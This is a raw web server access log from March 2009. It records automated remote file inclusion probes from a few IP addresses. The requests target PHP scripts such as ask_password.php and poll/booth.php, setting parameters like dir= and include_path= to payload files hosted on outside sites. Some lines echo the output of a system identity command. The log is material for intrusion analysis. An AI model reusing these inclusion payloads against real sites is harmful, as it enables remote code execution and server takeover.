61.63.90.81 - - [12/Mar/2009:20:50:01 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:01 -0500] "GET /logs//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
218.38.55.195 - - [12/Mar/2009:20:50:19 -0500] "GET /logs/access_log.1216512000///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.63.90.81 - - [12/Mar/2009:20:50:24 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:30 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:31 -0500] "GET //ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:31 -0500] "GET /logs//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:20:50:37 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.63.90.81 - - [12/Mar/2009:20:50:37 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:38 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
